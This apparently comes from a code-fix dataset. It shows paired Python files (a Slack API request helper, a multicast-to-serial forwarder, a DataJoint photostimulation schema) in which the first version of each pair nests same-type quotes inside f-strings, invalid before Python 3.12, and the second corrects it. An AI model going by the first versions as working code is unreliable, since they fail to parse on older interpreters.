event: Incoming :class:`slack.events.Event`
Returns:
boolean
"""
if event["type"] in RECONNECT_EVENTS:
return True
else:
return False
def validate_request_signature(
body: str, headers: MutableMapping, signing_secret: str
) -> None:
"""
Validate incoming request signature using the application signing secret.
Contrary to the ``team_id`` and ``verification_token`` verification this method is not called by ``slack-sansio`` when creating object from incoming HTTP request. Because the body of the request needs to be provided as text and not decoded as json beforehand.
Args:
body: Raw request body
headers: Request headers
signing_secret: Application signing_secret
Raise:
:class:`slack.exceptions.InvalidSlackSignature`: when provided and calculated signature do not match
:class:`slack.exceptions.InvalidTimestamp`: when incoming request timestamp is more than 5 minutes old
"""
request_timestamp = int(headers["X-Slack-Request-Timestamp"])
if (int(time.time()) - request_timestamp) > (60 * 5):
raise exceptions.InvalidTimestamp(timestamp=request_timestamp)
slack_signature = headers["X-Slack-Signature"]
calculated_signature = (
"v0="
+ hmac.new(
signing_secret.encode("utf-8"),
f"""v0:{headers["X-Slack-Request-Timestamp"]}:{body}""".encode("utf-8"),
digestmod=hashlib.sha256,
).hexdigest()
)
if not hmac.compare_digest(slack_signature, calculated_signature):
raise exceptions.InvalidSlackSignature(slack_signature, calculated_signature)
| """
Collection of functions for sending and decoding request to or from the slack API
"""
import cgi
import hmac
import json
import time
import base64
import hashlib
import logging
from typing import Tuple, Union, Optional, MutableMapping
from . import HOOK_URL, ROOT_URL, events, methods, exceptions
LOG = logging.getLogger(__name__)
RECONNECT_EVENTS = ("team_migration_started", "goodbye")
"""Events type preceding a disconnection"""
SKIP_EVENTS = ("reconnect_url",)
"""Events that do not need to be dispatched"""
ITERMODE = ("cursor", "page", "timeline")
"""Supported pagination mode"""
def raise_for_status(
status: int, headers: MutableMapping, data: MutableMapping
) -> None:
"""
Check request response status
Args:
status: Response status
headers: Response headers
data: Response data
Raises:
:class:`slack.exceptions.RateLimited`: For 429 status code
:class:`slack.exceptions:HTTPException`:
"""
if status != 200:
if status == 429:
if isinstance(data, str):
error = data
else:
error = data.get("error", "ratelimited")
try:
retry_after = int(headers.get("Retry-After", 1))
except ValueError:
retry_after = 1
raise exceptions.RateLimited(retry_after, error, status, headers, data)
else:
raise exceptions.HTTPException(status, headers, data)
def raise_for_api_error(headers: MutableMapping, data: MutableMapping) -> None:
"""
Check request response for Slack API error
Args:
headers: Response headers
data: Response data
Raises:
:class:`slack.exceptions.SlackAPIError`
"""
if not data["ok"]:
raise exceptions.SlackAPIError(data.get("error", "unknow_error"), headers, data)
if "warning" in data:
LOG.warning("Slack API WARNING: %s", data["warning"])
def decode_body(headers: MutableMapping, body: bytes) -> dict:
"""
Decode the response body
For 'application/json' content-type load the body as a dictionary
Args:
headers: Response headers
body: Response body
Returns:
decoded body
"""
type_, encoding = parse_content_type(headers)
decoded_body = body.decode(encoding)
# There is one api that just returns `ok` instead of json. In order to have a consistent API we decided to modify the returned payload into a dict.
if type_ == "application/json":
payload = json.loads(decoded_body)
else:
if decoded_body == "ok":
payload = {"ok": True}
else:
payload = {"ok": False, "data": decoded_body}
return payload
def parse_content_type(headers: MutableMapping) -> Tuple[Optional[str], str]:
"""
Find content-type and encoding of the response
Args:
headers: Response headers
Returns:
:py:class:`tuple` (content-type, encoding)
"""
content_type = headers.get("content-type")
if not content_type:
return None, "utf-8"
else:
type_, parameters = cgi.parse_header(content_type)
encoding = parameters.get("charset", "utf-8")
return type_, encoding
def prepare_request(
url: Union[str, methods],
data: Optional[MutableMapping],
headers: Optional[MutableMapping],
global_headers: MutableMapping,
token: str,
as_json: Optional[bool] = None,
) -> Tuple[str, Union[str, MutableMapping], MutableMapping]:
"""
Prepare outgoing request
Create url, headers, add token to the body and if needed json encode it
Args:
url: :class:`slack.methods` item or string of url
data: Outgoing data
headers: Custom headers
global_headers: Global headers
token: Slack API token
as_json: Post JSON to the slack API
Returns:
:py:class:`tuple` (url, body, headers)
"""
if isinstance(url, methods):
as_json = as_json or url.value[3]
real_url = url.value[0]
else:
real_url = url
as_json = False
if not headers:
headers = {**global_headers}
else:
headers = {**global_headers, **headers}
payload: Optional[Union[str, MutableMapping]] = None
if real_url.startswith(HOOK_URL) or (real_url.startswith(ROOT_URL) and as_json):
payload, headers = _prepare_json_request(data, token, headers)
elif real_url.startswith(ROOT_URL) and not as_json:
payload = _prepare_form_encoded_request(data, token)
else:
real_url = ROOT_URL + real_url
payload = _prepare_form_encoded_request(data, token)
return real_url, payload, headers
def _prepare_json_request(
data: Optional[MutableMapping], token: str, headers: MutableMapping
) -> Tuple[str, MutableMapping]:
headers["Authorization"] = f"Bearer {token}"
headers["Content-type"] = "application/json; charset=utf-8"
if isinstance(data, events.Message):
payload = data.to_json()
else:
payload = json.dumps(data or {})
return payload, headers
def _prepare_form_encoded_request(
data: Optional[MutableMapping], token: str
) -> MutableMapping:
if isinstance(data, events.Message):
data = data.serialize()
if not data:
data = {"token": token}
elif "token" not in data:
data["token"] = token
return data
def decode_response(status: int, headers: MutableMapping, body: bytes) -> dict:
"""
Decode incoming response
Args:
status: Response status
headers: Response headers
body: Response body
Returns:
Response data
"""
data = decode_body(headers, body)
raise_for_status(status, headers, data)
raise_for_api_error(headers, data)
return data
def find_iteration(
url: Union[methods, str],
itermode: Optional[str] = None,
iterkey: Optional[str] = None,
) -> Tuple[str, str]:
"""
Find iteration mode and iteration key for a given :class:`slack.methods`
Args:
url: :class:`slack.methods` or string url
itermode: Custom iteration mode
iterkey: Custom iteration key
Returns:
:py:class:`tuple` (itermode, iterkey)
"""
if isinstance(url, methods):
if not itermode:
itermode = url.value[1]
if not iterkey:
iterkey = url.value[2]
if not iterkey or not itermode:
raise ValueError("Iteration not supported for: {}".format(url))
elif itermode not in ITERMODE:
raise ValueError("Iteration not supported for: {}".format(itermode))
return itermode, iterkey
def prepare_iter_request(
url: Union[methods, str],
data: MutableMapping,
*,
iterkey: Optional[str] = None,
itermode: Optional[str] = None,
limit: int = 200,
itervalue: Optional[Union[str, int]] = None,
) -> Tuple[MutableMapping, str, str]:
"""
Prepare outgoing iteration request
Args:
url: :class:`slack.methods` item or string of url
data: Outgoing data
limit: Maximum number of results to return per call.
iterkey: Key in response data to iterate over (required for url string).
itermode: Iteration mode (required for url string) (one of `cursor`, `page` or `timeline`)
itervalue: Value for current iteration (cursor hash, page or timestamp depending on the itermode)
Returns:
:py:class:`tuple` (data, iterkey, itermode)
"""
itermode, iterkey = find_iteration(url, itermode, iterkey)
if itermode == "cursor":
data["limit"] = limit
if itervalue:
data["cursor"] = itervalue
elif itermode == "page":
data["count"] = limit
if itervalue:
data["page"] = itervalue
elif itermode == "timeline":
data["count"] = limit
if itervalue:
data["latest"] = itervalue
return data, iterkey, itermode
def decode_iter_request(data: dict) -> Optional[Union[str, int]]:
"""
Decode incoming response from an iteration request
Args:
data: Response data
Returns:
Next itervalue
"""
if "response_metadata" in data:
return data["response_metadata"].get("next_cursor")
elif "paging" in data:
current_page = int(data["paging"].get("page", 1))
max_page = int(data["paging"].get("pages", 1))
if current_page < max_page:
return current_page + 1
elif "has_more" in data and data["has_more"] and "latest" in data:
return data["messages"][-1]["ts"]
return None
def discard_event(event: events.Event, bot_id: str = None) -> bool:
"""
Check if the incoming event needs to be discarded
Args:
event: Incoming :class:`slack.events.Event`
bot_id: Id of connected bot
Returns:
boolean
"""
if event["type"] in SKIP_EVENTS:
return True
elif bot_id and isinstance(event, events.Message):
if event.get("bot_id") == bot_id:
LOG.debug("Ignoring event: %s", event)
return True
elif "message" in event and event["message"].get("bot_id") == bot_id:
LOG.debug("Ignoring event: %s", event)
return True
return False
def need_reconnect(event: events.Event) -> bool:
"""
Check if RTM needs reconnecting
Args:
event: Incoming :class:`slack.events.Event`
Returns:
boolean
"""
if event["type"] in RECONNECT_EVENTS:
return True
else:
return False
def validate_request_signature(
body: str, headers: MutableMapping, signing_secret: str
) -> None:
"""
Validate incoming request signature using the application signing secret.
Contrary to the ``team_id`` and ``verification_token`` verification this method is not called by ``slack-sansio`` when creating object from incoming HTTP request. Because the body of the request needs to be provided as text and not decoded as json beforehand.
Args:
body: Raw request body
headers: Request headers
signing_secret: Application signing_secret
Raise:
:class:`slack.exceptions.InvalidSlackSignature`: when provided and calculated signature do not match
:class:`slack.exceptions.InvalidTimestamp`: when incoming request timestamp is more than 5 minutes old
"""
request_timestamp = int(headers["X-Slack-Request-Timestamp"])
if (int(time.time()) - request_timestamp) > (60 * 5):
raise exceptions.InvalidTimestamp(timestamp=request_timestamp)
slack_signature = headers["X-Slack-Signature"]
calculated_signature = (
"v0="
+ hmac.new(
signing_secret.encode("utf-8"),
f"""v0:{headers["X-Slack-Request-Timestamp"]}:{body}""".encode("utf-8"),
digestmod=hashlib.sha256,
).hexdigest()
)
if not hmac.compare_digest(slack_signature, calculated_signature):
raise exceptions.InvalidSlackSignature(slack_signature, calculated_signature)
|
'''
Multicast->Serial Server by: JOR
Reads multicast packets from a particular set of addresses and ports.
Test with McSimulator
Alpha: 08MAR22
'''
import socket, serial
import settings.mc as settings
# Swiches for selecting sources
enable_base_gga = 1
enable_heading_gga = 1
enable_heading_hdt = 1
# Set multicast information
MCAST_GRP = settings.MCSERVER["MCAST_GROUP"]
SERVER_ADDRESS1 = ('', settings.MCSERVER["PORT1"])
SERVER_ADDRESS2 = ('', settings.MCSERVER["PORT2"])
SERVER_ADDRESS3 = ('', settings.MCSERVER["PORT3"])
MCAST_IF_IP = settings.MCSERVER["IP_ADDRESS"]
SERIALPORT = settings.MCSERVER["SERIALPORT"]
print('This is the server.')
print(f'Make sure its IP address matches {MCAST_IF_IP} in settings.')
print(f'This selects which interface is used to listen for multicast as {MCAST_GRP}.')
print('This script has no error handling, by design.')
# Base Position
if enable_base_gga:
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.bind(SERVER_ADDRESS1)
print(f'Listening on {settings.MCSERVER['PORT1']}')
s1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GRP) + socket.inet_aton(MCAST_IF_IP))
# Heading Sensor Position
if enable_heading_gga:
s2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s2.bind(SERVER_ADDRESS2)
print(f'Listening on {settings.MCSERVER['PORT2']}')
s2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GRP) + socket.inet_aton(MCAST_IF_IP))
# UBX Heading
if enable_heading_hdt:
s3 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s3.bind(SERVER_ADDRESS3)
print(f'Listening on {settings.MCSERVER['PORT3']}')
s3.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GRP) + socket.inet_aton(MCAST_IF_IP))
with serial.Serial(SERIALPORT) as s:
s.baudrate = 115200
s.bytesize = serial.EIGHTBITS
s.parity = serial.PARITY_NONE
s.stopbits = serial.STOPBITS_ONE
s.timeout = None
while True:
print('Waiting to transceive messages')
if enable_base_gga:
data1, address1 = s1.recvfrom(1024)
print(f'received {len(data1)} bytes from s1 {address1} as {data1}')
s.write(data1 + b'\r\n')
if enable_heading_gga:
data2, address2 = s2.recvfrom(1024)
print(f'received {len(data2)} bytes from s2 {address2} as {data2}')
s.write(data2 + b'\r\n')
if enable_heading_hdt:
data3, address3 = s3.recvfrom(1024)
print(f'received {len(data3)} bytes from s3 {address3} as {data3}')
s.write(data3 + b'\r\n')
| '''
Multicast->Serial Server by: JOR
Reads multicast packets from a particular set of addresses and ports.
Test with McSimulator
Alpha: 08MAR22
'''
import socket, serial
import settings.mc as settings
# Swiches for selecting sources
enable_base_gga = 1
enable_heading_gga = 1
enable_heading_hdt = 1
# Set multicast information
MCAST_GRP = settings.MCSERVER["MCAST_GROUP"]
SERVER_ADDRESS1 = ('', settings.MCSERVER["PORT1"])
SERVER_ADDRESS2 = ('', settings.MCSERVER["PORT2"])
SERVER_ADDRESS3 = ('', settings.MCSERVER["PORT3"])
MCAST_IF_IP = settings.MCSERVER["IP_ADDRESS"]
SERIALPORT = settings.MCSERVER["SERIALPORT"]
print('This is the server.')
print(f'Make sure its IP address matches {MCAST_IF_IP} in settings.')
print(f'This selects which interface is used to listen for multicast as {MCAST_GRP}.')
print('This script has no error handling, by design.')
# Base Position
if enable_base_gga:
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.bind(SERVER_ADDRESS1)
print(f'Listening on {settings.MCSERVER["PORT1"]}')
s1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GRP) + socket.inet_aton(MCAST_IF_IP))
# Heading Sensor Position
if enable_heading_gga:
s2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s2.bind(SERVER_ADDRESS2)
print(f'Listening on {settings.MCSERVER["PORT2"]}')
s2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GRP) + socket.inet_aton(MCAST_IF_IP))
# UBX Heading
if enable_heading_hdt:
s3 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s3.bind(SERVER_ADDRESS3)
print(f'Listening on {settings.MCSERVER["PORT3"]}')
s3.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GRP) + socket.inet_aton(MCAST_IF_IP))
with serial.Serial(SERIALPORT) as s:
s.baudrate = 115200
s.bytesize = serial.EIGHTBITS
s.parity = serial.PARITY_NONE
s.stopbits = serial.STOPBITS_ONE
s.timeout = None
while True:
print('Waiting to transceive messages')
if enable_base_gga:
data1, address1 = s1.recvfrom(1024)
print(f'received {len(data1)} bytes from s1 {address1} as {data1}')
s.write(data1 + b'\r\n')
if enable_heading_gga:
data2, address2 = s2.recvfrom(1024)
print(f'received {len(data2)} bytes from s2 {address2} as {data2}')
s.write(data2 + b'\r\n')
if enable_heading_hdt:
data3, address3 = s3.recvfrom(1024)
print(f'received {len(data3)} bytes from s3 {address3} as {data3}')
s.write(data3 + b'\r\n')
|
'''
Schema of stimulation information.
'''
import re
import os
from datetime import datetime
import numpy as np
import scipy.io as sio
import datajoint as dj
import h5py as h5
from . import reference, subject, utilities, stimulation, acquisition, analysis
schema = dj.schema(dj.config['custom'].get('database.prefix', '') + 'stimulation')
@schema
class PhotoStimDevice(dj.Lookup):
definition = """ # Information about the devices used for photo stimulation
device_name: varchar(32)
---
device_desc = "": varchar(1024)
"""
@schema
class PhotoStimulationInfo(dj.Manual):
definition = """
-> reference.ActionLocation
-> PhotoStimDevice
photo_stim_excitation_lambda: decimal(6,2) # (nm) excitation wavelength
---
photo_stim_method = 'laser' : enum('fiber', 'laser')
photo_stim_duration = null: float # in ms, stimulus duration
photo_stim_shape = '': varchar(24) # shape of photostim, cosine or pulsive
photo_stim_freq = null: float # in Hz, frequency of photostimulation
photo_stim_notes = '': varchar(128)
"""
@schema
class PhotoStimulation(dj.Manual):
definition = """ # Photostimulus profile used for stimulation in this session
-> acquisition.Session
photostim_datetime: datetime # the time of performing this stimulation with respect to start time of the session, in the scenario of multiple stimulations per session
---
-> PhotoStimulationInfo
photostim_timeseries=null: longblob # (mW)
photostim_start_time=null: float # (s) first timepoint of photostim recording
photostim_sampling_rate=null: float # (Hz) sampling rate of photostim recording
"""
@schema
class TrialPhotoStimInfo(dj.Imported):
definition = """ # information related to the stimulation settings for this trial
-> acquisition.TrialSet.Trial
---
photo_stim_type: enum('stimulation','inhibition','N/A')
photo_stim_period: enum('sample','delay','response','N/A')
photo_stim_power: float # (mW) stimulation power
photo_loc_galvo_x: float # (mm) photostim coordinates field
photo_loc_galvo_y: float # (mm) photostim coordinates field
photo_loc_galvo_z: float # (mm) photostim coordinates field
"""
def make(self, key):
# this function implements the ingestion of Trial stim info into the pipeline
return None
@schema
class TrialSegmentedPhotoStimulus(dj.Computed):
definition = """
-> PhotoStimulation
-> acquisition.TrialSet.Trial
-> analysis.TrialSegmentationSetting
---
segmented_photostim: longblob
"""
# custom key_source where acquisition.PhotoStimulation.photostim_timeseries exist
key_source = acquisition.TrialSet.Trial * analysis.TrialSegmentationSetting * (
PhotoStimulation - 'photostim_timeseries is NULL')
def make(self, key):
# get event, pre/post stim duration
event_name, pre_stim_dur, post_stim_dur = (analysis.TrialSegmentationSetting & key).fetch1(
'event', 'pre_stim_duration', 'post_stim_duration')
# get raw
fs, first_time_point, photostim_timeseries = (PhotoStimulation & key).fetch1(
'photostim_sampling_rate', 'photostim_start_time', 'photostim_timeseries')
# segmentation
try:
key['segmented_photostim'] = analysis.perform_trial_segmentation(key, event_name, pre_stim_dur,
post_stim_dur, photostim_timeseries,
fs, first_time_point)
except analysis.EventChoiceError as e:
raise e
self.insert1(key)
print(f'Perform trial-segmentation of photostim for trial: {key['trial_id']}')
| '''
Schema of stimulation information.
'''
import re
import os
from datetime import datetime
import numpy as np
import scipy.io as sio
import datajoint as dj
import h5py as h5
from . import reference, subject, utilities, stimulation, acquisition, analysis
schema = dj.schema(dj.config['custom'].get('database.prefix', '') + 'stimulation')
@schema
class PhotoStimDevice(dj.Lookup):
definition = """ # Information about the devices used for photo stimulation
device_name: varchar(32)
---
device_desc = "": varchar(1024)
"""
@schema
class PhotoStimulationInfo(dj.Manual):
definition = """
-> reference.ActionLocation
-> PhotoStimDevice
photo_stim_excitation_lambda: decimal(6,2) # (nm) excitation wavelength
---
photo_stim_method = 'laser' : enum('fiber', 'laser')
photo_stim_duration = null: float # in ms, stimulus duration
photo_stim_shape = '': varchar(24) # shape of photostim, cosine or pulsive
photo_stim_freq = null: float # in Hz, frequency of photostimulation
photo_stim_notes = '': varchar(128)
"""
@schema
class PhotoStimulation(dj.Manual):
definition = """ # Photostimulus profile used for stimulation in this session
-> acquisition.Session
photostim_datetime: datetime # the time of performing this stimulation with respect to start time of the session, in the scenario of multiple stimulations per session
---
-> PhotoStimulationInfo
photostim_timeseries=null: longblob # (mW)
photostim_start_time=null: float # (s) first timepoint of photostim recording
photostim_sampling_rate=null: float # (Hz) sampling rate of photostim recording
"""
@schema
class TrialPhotoStimInfo(dj.Imported):
definition = """ # information related to the stimulation settings for this trial
-> acquisition.TrialSet.Trial
---
photo_stim_type: enum('stimulation','inhibition','N/A')
photo_stim_period: enum('sample','delay','response','N/A')
photo_stim_power: float # (mW) stimulation power
photo_loc_galvo_x: float # (mm) photostim coordinates field
photo_loc_galvo_y: float # (mm) photostim coordinates field
photo_loc_galvo_z: float # (mm) photostim coordinates field
"""
def make(self, key):
# this function implements the ingestion of Trial stim info into the pipeline
return None
@schema
class TrialSegmentedPhotoStimulus(dj.Computed):
definition = """
-> PhotoStimulation
-> acquisition.TrialSet.Trial
-> analysis.TrialSegmentationSetting
---
segmented_photostim: longblob
"""
# custom key_source where acquisition.PhotoStimulation.photostim_timeseries exist
key_source = acquisition.TrialSet.Trial * analysis.TrialSegmentationSetting * (
PhotoStimulation - 'photostim_timeseries is NULL')
def make(self, key):
# get event, pre/post stim duration
event_name, pre_stim_dur, post_stim_dur = (analysis.TrialSegmentationSetting & key).fetch1(
'event', 'pre_stim_duration', 'post_stim_duration')
# get raw
fs, first_time_point, photostim_timeseries = (PhotoStimulation & key).fetch1(
'photostim_sampling_rate', 'photostim_start_time', 'photostim_timeseries')
# segmentation
try:
key['segmented_photostim'] = analysis.perform_trial_segmentation(key, event_name, pre_stim_dur,
post_stim_dur, photostim_timeseries,
fs, first_time_point)
except analysis.EventChoiceError as e:
raise e
self.insert1(key)
print(f'Perform trial-segmentation of photostim for trial: {key["trial_id"]}')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.